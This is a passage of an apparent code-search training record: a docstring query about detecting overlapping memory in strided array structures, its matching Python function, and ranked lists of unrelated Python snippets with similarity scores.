self.cluster_size_dist[shorter_index].get(len_spectra,0) + 1\n # build the noeds for longer cluster list, and get the\n # distribution of cluster size.\n for cluster in self.cluster_lists[longer_index]:\n len_spectra = len(cluster.get_spectra())\n starlet = ClusterNode(cluster.id, len_spectra) \n self.starlets[cluster.id] = starlet\n\n self.cluster_spectra_num[longer_index] += len_spectra\n self.cluster_size_dist[longer_index][len_spectra] = self.cluster_size_dist[longer_index].get(len_spectra,0) + 1\n # do the comparing, and network building\n for i in range (0, len(self.cluster_lists[shorter_index])):\n cluster0 = self.cluster_lists[shorter_index][i] \n for j in range (i, len(self.cluster_lists[longer_index])):\n cluster1 = self.cluster_lists[longer_index][j] \n (shared_spec_num, similarity) = self.calculate_similarity(cluster0, cluster1)\n if similarity == 0:\n continue\n self.similarity_dist[int(similarity*10)] = self.similarity_dist.get(int(similarity*10),0) + 1\n self.shared_spec_num += shared_spec_num\n\n self.stars[cluster0.id].add_nb_node(cluster1.id, similarity, shared_spec_num)\n self.starlets[cluster1.id].add_nb_node(cluster0.id, similarity, shared_spec_num)\n\n self.ave_star_size = self.cluster_spectra_num[shorter_index]/self.stars_length\n self.ave_starlet_size = self.cluster_spectra_num[longer_index]/self.starlets_length", "def test_read_multiple_lxyrs(self):\n cwd = os.path.dirname(os.path.abspath(__file__))\n test_dir = os.path.join(cwd, 'test_files/')\n ground_truths = read_lxyrs(test_dir)\n self.assertEquals(len(ground_truths), 3)\n self.assertEquals(len(ground_truths['test1']), 3)\n self.assertEquals(len(ground_truths['test_gt']), 2)", "def _compare_nested_sequences(seq1, seq2):\n return all([(l == m).all() for l, m in zip(seq1, seq2)])", "def test_len(self):\n\t\t# for 2 sample lists, I test that the len of the list is the len\n\t\t# of the LinkedList that is constructed with the list.\n\t\tl1 = [1]\n\t\tself.assertEqual(len(from_list_(l1).print()), len(l1))\n\t\tl2 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]\n\t\tself.assertEqual(len(from_list_(l2).print()), len(l2))", "def lcmt_check(grade_list_idx, grade_list_i, grade_list_j):\n return grade_list_idx == (grade_list_j - grade_list_i)", "def compare_data_info(lst):\n\n # Check data information is the same across the list of given objects\n for ind, f_obj in enumerate(lst[:-1]):\n if get_data_info(f_obj) != get_data_info(lst[ind+1]):\n return False\n\n # If no data info comparisons fail, return that objects have consistent information\n return True", "def check_shapes(arrs):\r\n shps = [i.shape for i in arrs]\r\n eq = np.all(np.array([shps[0] == i for i in shps[1:]]))\r\n err = \"Arrays arr not of the same shape...\"\r\n if not eq:\r\n raise ValueError(\"{}\\n{}\".format(err, shps))", "def seg_bound_comparison(orig_label_path, seg_data_path, bound_data_2d_path, bound_data_3d_path, fig_save_dir, sample_stack_rows=50):\n\n for sample in os.listdir(seg_data_path):\n if not sample.startswith('.') and osp.isdir(osp.join(seg_data_path, sample)):\n sample_path = osp.join(seg_data_path, sample)\n for artery in os.listdir(sample_path):\n orig_label_pick_path = osp.join(orig_label_path, sample, artery, 'data.pkl')\n seg_pick_path = osp.join(seg_data_path, sample, artery, 'data.pkl')\n bound_2d_pick_path = osp.join(bound_data_2d_path, sample, artery, 'data.pkl')\n bound_3d_pick_path = osp.join(bound_data_3d_path, sample, artery, 'data.pkl')\n artery_save_dir = osp.join(fig_save_dir, sample, artery)\n\n if not osp.exists(artery_save_dir):\n os.makedirs(artery_save_dir)\n\n # load original segmentation label\n with open(orig_label_pick_path, 'rb') as reader:\n labels_gt = pickle.load(reader)['label']\n\n with open(seg_pick_path, 'rb') as reader:\n data_seg = pickle.load(reader)\n # inputs_seg here is a list of length 1 (not modified yet)\n inputs_seg, labels_seg, preds_seg = data_seg['input'], data_seg['label'], data_seg['pred']\n start, n_class, width = data_seg['start'], data_seg['n_class'], data_seg['width']\n\n with open(bound_2d_pick_path, 'rb') as reader:\n data_bound = pickle.load(reader)\n # inputs_bound here is a list of length 1 (not modified yet)\n inputs_bound_2d, labels_bound_2d, preds_bound_2d, outputs_bound_2d = \\\n data_bound['input'], data_bound['label'], data_bound['pred'], data_bound['output']\n\n with open(bound_3d_pick_path, 'rb') as reader:\n data_bound = pickle.load(reader)\n # inputs_bound here is a list of length 1 (not modified yet)\n inputs_bound_3d, labels_bound_3d, preds_bound_3d, outputs_bound_3d = data_bound['input'], \\\n data_bound['label'], data_bound['pred'], data_bound['output']\n\n print(\"# of slices in total: {}\".format(len(inputs_seg[0]))) # number of slices\n\n for inx in range(0, len(inputs_seg[0]), sample_stack_rows):\n over = min(inx + sample_stack_rows, len(inputs_seg[0]))\n input_plot, label_gt_plot, label_bound_2d_plot, pred_seg_plot, pred_bound_2d_plot, pred_bound_3d_plot\\\n = inputs_seg[0][inx:over], labels_gt[inx:over], labels_bound_2d[inx:over], preds_seg[inx:over], \\\n preds_bound_2d[inx:over], preds_bound_3d[inx:over]\n\n # for result check\n print(\"input: {}, label_seg: {}, label_bound_2d: {}, pred_seg: {}, pred_bound_2d: {}, pred_bound_3d: {}\".format(\n input_plot.shape, label_gt_plot.shape, label_bound_2d_plot.shape, pred_seg_plot.shape, pred_bound_2d_plot.shape,\n pred_bound_3d_plot.shape))\n\n data_list = [{\"input\": input, \"GT_seg\": label_seg, \"pred_seg\": pred_seg, \"GT_bound\": label_bound, \"pred_2d_bound\": pred_bound_2d,\n \"pred_3d_bound\" : pred_bound_3d} for (input, label_seg, pred_seg, label_bound, pred_bound_2d, pred_bound_3d)\n in zip(input_plot, label_gt_plot, pred_seg_plot, label_bound_2d_plot, pred_bound_2d_plot, pred_bound_3d_plot)]\n\n # print(\"# of slices in batch: {}\".format(len(data_list)))\n file_name = \"{}/{:03d}\".format(artery_save_dir, inx + start)\n\n plot_seg_bound_comparison(data_list, rows=over - inx, start_with=0, show_every=1, start_inx=inx + start,\n n_class=n_class, fig_name=file_name, width=width, scale=4)", "def test_collect_lsubrs_called_from(self):\n\n g1 = pyCompressor.CandidateSubr(3, (0, 10))\n g1._global = True\n g2 = pyCompressor.CandidateSubr(3, (0, 20))\n g2._global = True\n g3 = pyCompressor.CandidateSubr(3, (0, 30))\n g3._global = True\n l1 = pyCompressor.CandidateSubr(3, (0, 40))\n l1._global = False\n l2 = pyCompressor.CandidateSubr(3, (0, 50))\n l2._global = False\n l3 = pyCompressor.CandidateSubr(3, (0, 60))\n l3._global = False\n\n g1._encoding = [(3, l1)]\n g2._encoding = [(3, l2), (6, g3)]\n g3._encoding = []\n l1._encoding = []\n l2._encoding = [(3, l3)]\n l3._encoding = []\n\n lsubrs = self.empty_compreffor.collect_lsubrs_called_from([g1, g2, g3])\n self.assertSetEqual(lsubrs, {l1, l2, l3})", "def is_lili_subset(sub_lili, full_lili):\n if len(sub_lili) != len(full_lili):\n warnings.warn(\"Inputs should have same length\")\n for i, li in enumerate(sub_lili):\n if len(li) > 0 and not set(li).issubset(set(full_lili[i])):\n return False\n return True", "def _compare_survey_structures(self, db_structure, local_structure):\n if not local_structure.equals(db_structure):\n self.log.info(f\"Survey structure data is not consistent with the table in the db\")\n return False\n else:\n return True", "def test_merge_list(short_ll, long_ll):\n assert ml(short_ll, long_ll) == 8\n assert len(long_ll) == 10", "def compare(self, *args):\n return _ida_hexrays.lvar_locator_t_compare(self, *args)", "def compare_sites(ind1, ind2, cns_t, samples, samples_nmode1, samples_nmode2, cnmode1, cnmode2, samples_lq1, samples_lq2, subtract_lq = True):\n data = []\n\n \n ids = [ind1, ind2]\n ids_mod = [\"_\".join(i.split('_')[:-1]) for i in ids]\n \n \n cns_1 = cns_t[ind1].to_dict()\n cns_2 = cns_t[ind2].to_dict()\n \n \n samples_nmode1 = [i for i in samples if cns_1[i] != cnmode1]\n samples_nmode2 = [i for i in samples if cns_2[i] != cnmode2]\n samples_to_compare = set(samples_nmode1 + samples_nmode2)\n if subtract_lq:\n # exclude LQ samps\n samples_to_exclude = set(samples_lq1 + samples_lq2)\n samples_to_compare_nmode = list(samples_to_compare.difference(samples_to_exclude))\n \n samples_to_compare_nmode = list(samples_to_compare.difference(samples_to_exclude))\n samples_to_compare_corr = list(set(samples).difference(samples_to_exclude))\n \n else: \n samples_to_compare_corr = samples\n samples_nmode1 = [i for i in samples if cns_1[i] != cnmode1]\n samples_nmode2 = [i for i in samples if cns_2[i] != cnmode2]\n samples_to_compare_nmode = list(set(samples_nmode1 + samples_nmode2))\n samples_to_exclude = []\n \n cns_nmode_1 = [int(cns_1[i]) for i in samples_to_compare_nmode]\n cns_nmode_2 = [int(cns_2[i]) for i in samples_to_compare_nmode]\n\n cns_corr_1 = [int(cns_1[i]) for i in samples_to_compare_corr]\n cns_corr_2 = [int(cns_2[i]) for i in samples_to_compare_corr]\n \n allele_dist1 = dict(Counter(cns_corr_1))\n allele_dist2 = dict(Counter(cns_corr_2))\n \n corr_coef = stats.pearsonr(cns_corr_1, cns_corr_2)[0]\n \n nsamp = len(samples_to_compare_nmode)\n nsamp_pass = len(samples_to_compare_corr)\n\n num_diff = compare_lists(cns_nmode_1, cns_nmode_2)\n alleles = set(cns_corr_1 + cns_corr_2)\n \n alleles1 = set(cns_corr_1)\n num_alleles1 = len(alleles1)\n alleles2 = set(cns_corr_2)\n num_alleles2 = len(alleles2)\n\n mean_diff_all = calculate_absolute_mean_diff(cns_corr_1, cns_corr_2)\n mean_diff_nmode = calculate_absolute_mean_diff(cns_nmode_1, cns_nmode_2)\n \n exact_match = (cns_corr_1 == cns_corr_2)\n\n \n try:\n perc_diff = num_diff/nsamp\n except:\n# print nsamp, 'nsamp is zero'\n perc_diff = 0\n\n out = [ind1, ind2, corr_coef, num_diff, nsamp, \n perc_diff, samples_to_compare_nmode, samples_to_compare_corr, \n list(samples_to_exclude), nsamp_pass, exact_match, mean_diff_all, mean_diff_nmode, \n alleles1, alleles2, num_alleles1, num_alleles2, allele_dist1, allele_dist2]\n\n return out", "def __compare(self,data,dataout):\n if(data == None or dataout == None):\n return False\n if(len(data) != len(dataout)):\n return False\n for i in range(len(data)):\n if(data[i] != dataout[i]):\n return False\n return True", "def read_pairwise_ld(snp1, snp2):\n\tif snp1.rsID == snp2.rsID:\n\t\treturn 1\n\tif snp1.rsID in r2_cache and snp2.rsID in r2_cache:\n\t\treturn r2_cache[snp1.rsID][snp2.rsID]\n\telse:\n\t\treturn 0" ]
[ "0.8107347", "0.5830058", "0.5787684", "0.57273674", "0.5708086", "0.547884", "0.54676497", "0.5341118", "0.53267294", "0.5325244", "0.5295086", "0.52857417", "0.52715236", "0.52042264", "0.5128856", "0.50830114", "0.50252223", "0.5011563", "0.50000906", "0.49984854", "0.49905896", "0.49851516", "0.4983977", "0.49804145", "0.49787208", "0.49598733", "0.49352184", "0.491702", "0.4916425", "0.4909734" ]
0.8097147
1
The structure 't' is overlapping if at least one memory location is visited twice while iterating through all possible tuples of indices.
def is_overlapping(t): memlen, itemsize, ndim, shape, strides, offset = t visited = 1<<memlen for ind in indices(shape): i = memory_index(ind, t) bit = 1<<i if visited & bit: return True visited |= bit return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_overlapping(t):\n memlen, itemsize, ndim, shape, strides, offset = t\n visited = 1 << memlen\n for ind in indices(shape):\n i = memory_index(ind, t)\n bit = 1 << i\n if visited & bit:\n return True\n visited |= bit\n return False", "def listOfOverlappingTTPairs():\n listOfHalfModules = listOfTTHalfModules()\n ttmap = TTModulesMap_instance\n pairs = []\n regions = {'A':1, 'B':2, 'C':3}\n print \"Overlapping TT half modules:\"\n for hm1 in listOfHalfModules:\n for hm2 in listOfHalfModules:\n # they must be different\n if hm1 == hm2: continue\n # they must be both on top or both on bottom\n if locateTTHalfModule(hm1)[3] != locateTTHalfModule(hm2)[3]: continue\n # they must be on the same layer\n if locateTTHalfModule(hm1)[0] != locateTTHalfModule(hm2)[0]: continue\n # avoid duplicates\n if (hm1, hm2) in pairs: continue\n if (hm2, hm1) in pairs: continue\n # they must be contiguous:\n if (locateTTHalfModule(hm1)[1] == locateTTHalfModule(hm2)[1]):\n if (abs(locateTTHalfModule(hm1)[2] - locateTTHalfModule(hm2)[2]) == 1):\n pairs.append( (hm1, hm2) )\n else:\n num1 = locateTTHalfModule(hm1)[2]\n num2 = locateTTHalfModule(hm2)[2]\n max1 = ttmap.numberOfModules[locateTTHalfModule(hm1)[0]]['Region'+locateTTHalfModule(hm1)[1]] - 1\n max2 = ttmap.numberOfModules[locateTTHalfModule(hm2)[0]]['Region'+locateTTHalfModule(hm2)[1]] - 1\n nreg1 = regions[locateTTHalfModule(hm1)[1]]\n nreg2 = regions[locateTTHalfModule(hm2)[1]]\n if ( (num1==max1 and num2==0 and nreg2-nreg1==1) or (num2==max2 and num1==0 and nreg1-nreg2==1) ):\n pairs.append( (hm1, hm2) )\n print '\\t', hm1, hm2\n ## - same region\n #if ((abs(locateTTHalfModule(hm1)[2] - locateTTHalfModule(hm2)[2]) != 1)\n # and (locateTTHalfModule(hm1)[0] != locateTTHalfModule(hm2)[0])): continue\n ## - or neighbouring region\n #elif not ((locateTTHalfModule(hm1)[0] != locateTTHalfModule(hm2)[0])\n # and ( ( (ttmap.numberOfModules[locateTTHalfModule(hm1)[0]] == locateTTHalfModule(hm1)[2]+1 )\n # and (locateTTHalfModule(hm2)[2] == 0) )\n # or ( (ttmap.numberOfModules[locateTTHalfModule(hm2)[0]] == locateTTHalfModule(hm2)[2]+1 )\n # and (locateTTHalfModule(hm1)[2] == 0) ) ) ): continue\n ## append to list of pairs\n #pairs.append( (hm1, hm2) )\n print\n return pairs", "def test_idx_overlap():\n # Base array\n arr = np.arange(10)\n\n # Test subset overlap\n idx = u.idx_overlap(arr, np.arange(5, 8))\n assert len(idx) == 3\n\n # Test complete overlap\n idx = u.idx_overlap(arr, np.arange(-5, 20))\n assert len(idx) == 8\n\n # Test partial right overlap\n idx = u.idx_overlap(arr, np.arange(5, 20))\n assert len(idx) == 4\n\n # Test partial left overlap\n idx = u.idx_overlap(arr, np.arange(-5, 5))\n assert len(idx) == 4\n\n # Test no overlap\n idx = u.idx_overlap(arr, np.arange(10, 20))\n assert len(idx) == 0", "def _pair_indices(self):\n indices_src = []\n indices_dst = []\n for i in range(self.walk_len):\n for j in range(max(i - self.l, 0), i):\n indices_src.append(i)\n indices_dst.append(j)\n for j in range(i + 1, min(i + self.r + 1, self.walk_len)):\n indices_src.append(i)\n indices_dst.append(j)\n return indices_src, indices_dst", "def _test_pairs(self, idx0, idx1):\n pass", "def overlap_conflict(out, *inputs):\n from . import _bh\n\n for i in inputs:\n if not np.isscalar(i):\n if np.may_share_memory(out, i) and not _bh.same_view(out, i):\n return True\n return False", "def overlaps(self, indices):\n p_indices = []\n shape = []\n\n if not indices:\n return p_indices, shape\n\n for index, (r0, r1), size in zip(indices, self.location, self.shape):\n if isinstance(index, slice):\n stop = size\n if index.stop < r1:\n stop -= r1 - index.stop\n\n start = index.start - r0\n if start < 0:\n start %= index.step # start is now +ve\n\n if start >= stop:\n # This partition does not span the slice\n return None, None\n\n # Still here?\n step = index.step\n index = slice(start, stop, step)\n index_size, rem = divmod(stop - start, step)\n if rem:\n index_size += 1\n\n else:\n\n # Still here?\n index = [i - r0 for i in index if r0 <= i < r1]\n index_size = len(index)\n if index_size == 0:\n return None, None\n elif index_size == 1:\n index = slice(index[0], index[0] + 1)\n else:\n index0 = index[0]\n step = index[1] - index0\n if step > 0:\n start, stop = index0, index[-1] + 1\n elif step < 0:\n start, stop = index0, index[-1] - 1\n if index == list(range(start, stop, step)):\n # Replace the list with a slice object\n if stop < 0:\n stop = None\n index = slice(start, stop, step)\n # --- End: if\n\n p_indices.append(index)\n shape.append(index_size)\n # --- End: for\n\n # Still here? Then this partition does span the slice and the\n # elements of this partition specified by p_indices are in the\n # slice.\n return p_indices, shape", "def is_redundant(t, t_objects):\n\n x,y,w,h = t.bounding_box\n\n for tracker in t_objects:\n if t.face_id == tracker.face_id:\n continue\n x_t, y_t, w_t, h_t = tracker.bounding_box\n result = in_rect(np.array([[x,y],[x+w,y], [x,y+h], [x+w,y+h]]),\n (x_t, y_t), (x_t+w_t, y_t+h_t))\n\n if sum(result) > 1:\n return True\n return False", "def duplicates(self, tuples):\n b, k, l, r = tuples.size()\n\n primes = self.primes[:r]\n primes = primes[None, None, None, :].expand(b, k, l, r)\n unique = ((tuples+1) ** primes).prod(dim=3) # unique identifier for each tuple\n\n sorted, sort_idx = torch.sort(unique, dim=2)\n _, unsort_idx = torch.sort(sort_idx, dim=2) # get the idx required to reverse the sort\n\n mask = sorted[:, :, 1:] == sorted[:, :, :-1]\n\n zs = torch.zeros(b, k, 1, dtype=torch.uint8, device='cuda' if self.use_cuda else 'cpu')\n mask = torch.cat([zs, mask], dim=2)\n\n return torch.gather(mask, 2, unsort_idx)", "def get_overlapping_indices(self):\n return self._get_atomic_overlaps()", "def neighbours(t,p):\r\n neighbour = set()\r\n\r\n if p[t][1] != 0:\r\n neighbour.add(tuple(p[t][1]))\r\n if p[t][2] != 0:\r\n neighbour.add(tuple(p[t][2]))\r\n if p[t][3] != 0:\r\n neighbour.add(tuple(p[t][3]))\r\n if p[t][4] != 0:\r\n neighbour.add(tuple(p[t][4]))\r\n \r\n return neighbour", "def overlapping(x,y):\n for i in range(0,len(x)):\n for j in range(0,len(y)):\n if x[i] == y[j]:\n return True\n else:\n continue#reapet until finished all number in the list\n return False", "def overlap_with(self, other):", "def neighbours(assignment): \n for index_1, index_2 in itertools.combinations(range(len(assignment)), 2):\n new_assign = list(assignment)\n new_assign[index_1], new_assign[index_2] = new_assign[index_2], new_assign[index_1]\n yield tuple(new_assign)", "def full(self):\n for x in range(0,3):\n for y in range(0,3):\n if self[x,y] is None:\n return False\n return True", "def checkForOverlappingTasks(tasks, machines):\n for m in machines:\n compatibleTasks = []\n for t in tasks:\n if m == t.machine:\n compatibleTasks.append(t)\n slots = [] # time slot\n for ct in compatibleTasks:\n thisSlot = (ct.tBegin, ct.tEnd)\n if thisSlot not in slots:\n slots.append(thisSlot)\n # print(thisSlot)\n slots = sorted(slots)\n for s, slt in enumerate(slots[:-1]):\n for slt2 in slots[s+1:]:\n if slt[1] > slt2[0]:\n print(slt)\n print(slt2)\n return True\n return False", "def __get_index_pair__(self, target_tile:Union[StaticTile, DynamicTile]) -> tuple:\n for colNum, col in enumerate(self.map):\n for rowNum, tile in enumerate(col):\n if tile == target_tile:\n return (colNum, rowNum)", "def fill_overlap(previous, current, from_address,\n to_address) -> Tuple[str, List]:\n size = to_address - from_address\n return ('overlap',\n filler(memdf.name.overlap(from_address, -size), from_address,\n size, previous, current))", "def intersection_iteration(selection_space, intersect_space, self, cell):\n\n target_bed_map_array = self.target_bed_map_array\n\n iteration_count = 0\n tmp_intersection_list = []\n\n log = self.log\n\n # Get the number of unique breakpoints.\n self.seg_analyzer.break_points(cell=cell, permutation=True)\n unique_permutation_group_size = self.seg_analyzer.unique_permutation_group_size\n total_permutation_group_size = self.seg_analyzer.total_permutation_group_size\n\n # Retrieve a namedtuple of the intersect data\n total_targeted_data = [int(self.args.Total_Targeted), total_permutation_group_size-int(self.args.Total_Targeted)]\n unique_targeted_data = [int(self.args.Unique_Targeted), unique_permutation_group_size-int(self.args.Unique_Targeted)]\n\n log.info(\"Unique Combination Group Size {} for Segment Permutation: {}\"\n .format(cell, unique_permutation_group_size))\n log.info(\"Total Combination Group Size {} for Segment Permutation: {}\"\n .format(cell, total_permutation_group_size))\n\n permuted_sum_file = \"{0}{1}_{2}_seg_random_bin_total.bed\" \\\n .format(self.args.Working_Folder, self.args.Job_Name, cell)\n\n permuted_sum_file_out = open(permuted_sum_file, \"w\")\n sum_file_data = \"Total Targeted Segments\\tTotal Odds Ratio\\tTotal Fisher Ecact p_Value\\t\" \\\n \"Unique Targeted Segments\\tUnique Odds Ratio\\tUnique Fisher Exact p_Value\\n\"\n\n while iteration_count < int(self.args.Iteration_Count):\n iteration_count += 1\n # numpy.random.shuffle(selection_space)\n u = numpy.intersect1d(numpy.random.choice(selection_space, unique_permutation_group_size, replace=False),\n intersect_space)\n t = numpy.intersect1d(numpy.random.choice(selection_space, total_permutation_group_size, replace=True),\n intersect_space)\n\n if len(u) > 0:\n for seg in u:\n tmp_intersection_list.append(str(seg))\n\n t_intersect = len(t)\n u_intersect = len(u)\n t_oddsratio, t_pvalue = \\\n scipy.stats.fisher_exact([total_targeted_data, [t_intersect, total_permutation_group_size-t_intersect]])\n\n u_oddsratio, u_pvalue = \\\n scipy.stats.fisher_exact([unique_targeted_data, [u_intersect, unique_permutation_group_size-u_intersect]])\n\n sum_file_data += \"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\"\\\n .format(t_intersect, t_oddsratio, t_pvalue, u_intersect, u_oddsratio, u_pvalue)\n\n if iteration_count % int(self.args.Prog_Check) == 0:\n log.debug(\"{0} iterations of {1} for Segment Permutation Analysis using file {2}\"\n .format(iteration_count, int(self.args.Iteration_Count), permuted_sum_file))\n\n permuted_sum_file_out.write(sum_file_data)\n permuted_sum_file_out.close()\n\n log.debug(\"Processing {} data for output to segment permutation file.\".format(cell))\n\n seg_permute_data = \"For a given segment, how many times do targets intersect in {0} iterations?\\n\" \\\n \"chrom\\tstart\\tstop\\tSeg_ID\\tTotal_Targets\\tNumber_Per_Permutation\\tbin_size\\n\"\\\n .format(self.args.Iteration_Count)\n\n seg_counts = Counter(tmp_intersection_list)\n for seg in seg_counts:\n bed_tuple = \\\n target_bed_map_array[numpy.where(target_bed_map_array[:, 0] == int(seg))][:, 1].tolist()[0]\n\n chrom = self.bin_tracking_array[self.bin_tracking_array[:, 0] == int(seg)][0, 1].decode()\n coord_start = self.bin_tracking_array[self.bin_tracking_array[:, 0] == int(seg)][0, 2]\n coord_stop = self.bin_tracking_array[self.bin_tracking_array[:, 0] == int(seg)][0, 3]\n counts = len(bed_tuple)*seg_counts[seg]\n count = counts / int(self.args.Iteration_Count)\n bin_size = int(coord_stop) - int(coord_start)\n seg_permute_data += (\"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\t{6}\\n\"\n .format(chrom, coord_start, coord_stop, seg, counts, count, bin_size))\n\n seg_permute_file = open(\"{0}{1}_{2}_seg_permute.txt\"\n .format(self.args.Working_Folder, self.args.Job_Name, cell), 'w')\n\n seg_permute_file.write(seg_permute_data)\n seg_permute_file.close()\n\n # Tool_Box.delete([\"{}{}_{}.log\".format(self.args.Working_Folder, self.args.Job_Name, cell)])\n log.info(\"{} Permutation Complete\".format(cell))\n\n return", "def test_overlap():\n events = [['Event', '2017-11-21T10:00:00-08:00', '2017-11-21T11:00:00-08:00'],\n ['Event', '2017-11-21T10:30:00-08:00', '2017-11-21T11:20:00-08:00']]\n freetimes, _ = free(events, 9, 0, 17, 0, day_range, 30)\n fmt_freetime = output_format(freetimes)\n for i in fmt_freetime:\n print(i)\n assert fmt_freetime == ['Tue, Nov 21, 9:00 am to Tue, Nov 21, 10:00 am.',\n 'Tue, Nov 21, 11:20 am to Tue, Nov 21, 5:00 pm.',\n 'Wed, Nov 22, 9:00 am to Wed, Nov 22, 5:00 pm.',\n 'Thu, Nov 23, 9:00 am to Thu, Nov 23, 5:00 pm.',\n 'Fri, Nov 24, 9:00 am to Fri, Nov 24, 5:00 pm.',\n 'Sat, Nov 25, 9:00 am to Sat, Nov 25, 5:00 pm.',\n 'Sun, Nov 26, 9:00 am to Sun, Nov 26, 5:00 pm.',\n 'Mon, Nov 27, 9:00 am to Mon, Nov 27, 5:00 pm.']", "def naive(p, t):\n occurences = []\n for i in range(len(t) - len(p) + 1):\n match = True\n for j in range(len(p)):\n if t[i + j] != p[j]:\n match = False\n break\n if match:\n occurences.append(i)\n return occurences", "def untie_everything(self):\r\n self.tied_indices = []", "def _gen_matches(target_units, source_units, stoplist_set, features_size):\n for hits2positions in gen_hits2positions(\n target_units, source_units, stoplist_set, features_size):\n overhits2positions = {\n k: np.array(v) for k, v in hits2positions.items()\n if len(v) >= 2}\n for (t_ind, s_ind), positions in overhits2positions.items():\n yield (t_ind, s_ind, positions)", "def naive(p, t):\n\toccurence = []\n\tfor i in range(len(t)-len(p) + 1):\n\t\tmatch = True\n\t\tfor j in range(len(p)):\n\t\t\tif not p[j] == t[i+j]:\n\t\t\t\tmatch = False\n\t\t\t\tbreak\n\t\tif match:\n\t\t\toccurence.append(i)\n\treturn occurence", "def assert_mapping_consistency(layout):\n values = sorted(layout.values())\n keys = list(layout)\n ref_keys = [\"q\" + str(i) for i in range(len(keys))]\n if keys != ref_keys:\n raise PlacementError(\"Some physical qubits in the layout may be missing or duplicated.\")\n if values != list(range(len(values))):\n raise PlacementError(\"Some logical qubits in the layout may be missing or duplicated.\")", "def naive_2mm(p, t):\n\toccurence = []\n\tfor i in range(len(t)-len(p) + 1):\n\t\tmatch = True\n\t\tunmatch = 0\n\t\tfor j in range(len(p)):\n\t\t\tif not p[j] == t[i+j]:\n\t\t\t\tunmatch += 1\n\t\t\t\tif unmatch > 2:\n\t\t\t\t\tmatch = False\n\t\t\t\t\tbreak\n\t\tif match:\n\t\t\toccurence.append(i)\n\treturn occurence", "def shrink_offset_pairs(self):\n\n def int_from_block(i):\n u, v = self.blocks[i].bounds\n block_bytes = self.shrink_target.buffer[u:v]\n return int_from_bytes(block_bytes)\n\n def block_len(i):\n return self.blocks[i].length\n\n # Try reoffseting every pair\n def reoffset_pair(pair, o):\n n = len(self.blocks)\n # Number of blocks may have changed, need to validate\n valid_pair = [\n p\n for p in pair\n if p < n and int_from_block(p) > 0 and self.is_payload_block(p)\n ]\n\n if len(valid_pair) < 2:\n return\n\n m = min([int_from_block(p) for p in valid_pair])\n\n new_blocks = [\n self.shrink_target.buffer[u:v]\n for u, v in self.shrink_target.all_block_bounds()\n ]\n for i in valid_pair:\n new_blocks[i] = int_to_bytes(int_from_block(i) + o - m, block_len(i))\n buffer = hbytes().join(new_blocks)\n return self.incorporate_new_buffer(buffer)\n\n def is_non_zero_payload(block):\n return not block.all_zero and self.is_payload_block(block.index)\n\n for block_i, block_j in self.each_pair_of_blocks(\n is_non_zero_payload, is_non_zero_payload\n ):\n i = block_i.index\n j = block_j.index\n\n value_i = int_from_block(i)\n value_j = int_from_block(j)\n\n offset = min(value_i, value_j)\n Integer.shrink(\n offset, lambda o: reoffset_pair((i, j), o), random=self.random\n )", "def MeshVtxAdjacentVtxs (strMesh, index, blnAbsolutConnections=False, blnCreate=False):\n \"\"\"custom function\"\"\"\n #-----------------------------------------------------------------------------------------------------------------------------------------\n def CullDuplicates(seq, idfun=None): \n # order preserving \n if idfun is None: \n def idfun(x): return x \n seen = {} \n result = [] \n for item in seq: \n marker = idfun(item) \n if marker in seen: continue \n seen[marker] = 1 \n result.append(item) \n return result\n #-----------------------------------------------------------------------------------------------------------------------------------------\n MeshVtxAdjacentVtxs = []\n if rs.IsMesh(strMesh)==False : \n print \"strMesh is not an mesh\"\n return None\n if type(index)==type(\"string\"):\n print \"index is not an integer\"\n return None\n if type(index)==type(0.1): index = int(index)\n\n arrVertices = rs.MeshVertices (strMesh)\n arrFaceVertices = rs.MeshFaceVertices(strMesh)\n\n intCount = 0\n arrAdjacentVtxs = []\n for arrFace in arrFaceVertices:\n blnIsAdjacent = False\n for arrVtxIndex in arrFace:\n if arrVtxIndex == index :\n blnIsAdjacent = True\n if blnIsAdjacent :\n if blnAbsolutConnections :\n if arrFace[2]==arrFace[3] :\n for arrVtxIndex in arrFace :\n if arrVtxIndex != index :\n arrAdjacentVtxs.append( arrVtxIndex)\n else :\n if index == arrFace[0] :\n arrAdjacentVtxs.append( arrFace[3] )\n arrAdjacentVtxs.append( arrFace[1] )\n elif index == arrFace[1] :\n arrAdjacentVtxs.append( arrFace[0] )\n arrAdjacentVtxs.append( arrFace[2] )\n elif index == arrFace[2] :\n arrAdjacentVtxs.append( arrFace[1] )\n arrAdjacentVtxs.append( arrFace[3] )\n elif index == arrFace(3) :\n arrAdjacentVtxs.append( arrFace[2] )\n arrAdjacentVtxs.append( arrFace[0] )\n else :\n for arrVtxIndex in arrFace :\n if arrVtxIndex != index :\n arrAdjacentVtxs.append( arrVtxIndex )\n if type(arrAdjacentVtxs) != type([]) : return None\n arrOrderAdjacentVtxs = CullDuplicates(arrAdjacentVtxs)\n if blnCreate :\n arrStrPts = []\n for arrVtxIndex in arrOrderAdjacentVtxs:\n rs.AddPoint ( arrVertices[arrVtxIndex] )\n arrStrPts.append( arrVertices[arrVtxIndex] )\n return arrStrPts\n else :\n return arrOrderAdjacentVtxs", "def _maketriples_all(self):\n nholes = self.ctrs.shape[0]\n tlist = []\n for i in range(nholes):\n for j in range(nholes):\n for k in range(nholes):\n if i < j and j < k:\n tlist.append((i, j, k))\n tarray = np.array(tlist).astype(np.int)\n if self.verbose:\n print(\"tarray\", tarray.shape, \"\\n\", tarray)\n\n tname = []\n uvlist = []\n # foreach row of 3 elts...\n for triple in tarray:\n tname.append(\"{0:d}_{1:d}_{2:d}\".format(\n triple[0], triple[1], triple[2]))\n if self.verbose:\n print('triple:', triple, tname[-1])\n uvlist.append((self.ctrs[triple[0]] - self.ctrs[triple[1]],\n self.ctrs[triple[1]] - self.ctrs[triple[2]]))\n #print(len(uvlist), \"uvlist\", uvlist)\n if self.verbose:\n print(tarray.shape, np.array(uvlist).shape)\n return tarray, np.array(uvlist)", "def check_overlap(current, hit, overlap = 200):\n for prev in current:\n p_coords = prev[2:4]\n coords = hit[2:4]\n if get_overlap(coords, p_coords) >= overlap:\n return True\n return False" ]
